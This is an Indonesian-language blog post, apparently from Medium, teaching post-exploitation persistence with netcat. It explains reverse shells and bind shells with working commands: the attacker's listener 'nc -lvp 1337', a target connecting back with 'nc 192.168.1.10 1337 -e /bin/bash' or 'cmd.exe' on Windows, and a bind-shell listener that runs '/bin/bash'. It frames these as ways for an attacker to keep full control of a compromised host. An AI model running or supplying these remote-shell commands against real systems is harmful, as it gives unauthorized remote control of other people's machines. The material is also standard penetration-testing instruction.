Post Exploitation with Netcat

Muhammad Ap
3 min readDec 29, 2019

--

Setelah melakukan fase hacking, agar bisa mempertahankan koneksi kita bisa membuat backconnect. Salah satu tool yang sering digunakan adalah netcat.

Ada 2 jenis backconnect yaitu Reverse Shell dan Bind Shell.

Reverse Shell

Reverse shell adalah shell yang dimulai dari host target mencoba menghubungkan ke attacker yang dalam kondisi mendengarkan (listening) untuk mengambil shell.

Langsung saja. Berikut adalah langkah-langkah Reverse Shell

Pertama-tama kita buat attacker menjadi listener. Pada contoh kali ini port yang digunakan adalah 1337.untuk melakukan hal tersebut jalankan perintah berikut pada komputer attacker.

nc -lvp 1337

Ketika attacker sudah siap mendengarkan, selanjutnya adalah komputer target mencoba menghubungkan ke komputer attacker menggunakan alamat IP (atau domain) beserta port-nya, seperti berikut:

Pada linux:

nc 192.168.1.10 1337 -e /bin/bash

Pada Windows:

nc.exe 192.168.1.10 1337 -e cmd.exe

Jika berhasil seharusnya sekarang attacker sudah mendapatkan shell pada komputer target dan attacker punya kontrol penuh atas sesi yang sedang berjalan.

Maksudnya adalah, jika user root yang memulai shell pada komputer target artinya attacker memiliki hak akses root pada komputer target.

Contoh dari tampilan Reverse Shell adalah seperti berikut:

Perlu diketahui bahwa tidak semua versi netcat memiliki option -e dan perlu diketahui juga tidak semua sistem operasi menggunakan netcat.

Untuk mengatasi hal tersebut kita bisa melakukan reverse shell menggunakan bahasa pemrograman seperti php, python, bash, dll. Agar bisa melakukan hal tersebut anda bisa membaca artikel reverse shell cheat sheet.

Bind Shell

Sedangkan Bind shell adalah kebalikan dari Reverse Shell, yaitu shell yang dimulai dari attacker mencoba menghubungkan ke target, yang mana target berada pada kondisi mendengarkan (listening).

Gas

Pertama-tama kita buat komputer target menjadi listener. Pada contoh kali ini port yang digunakan adalah 1337.untuk melakukan hal tersebut jalankan perintah berikut pada komputer target.

nc -lvp 1337 -e /bin/bash

Ketika komputer target sudah siap mendengarkan, selanjutnya adalah attacker mencoba menghubungkan ke komputer target menggunakan alamat IP (atau domain) beserta port-nya, seperti berikut:

nc 192.168.1.10 1337

Sama seperti reverse shell, jika berhasil seharusnya sekarang attacker sudah mendapatkan shell pada komputer target dan attacker punya kontrol penuh atas sesi yang sedang berjalan.

Contoh dari tampilan Bind Shell adalah seperti berikut:

Sekian tutorial kali ini, semoga bermanfaat :) .

--

--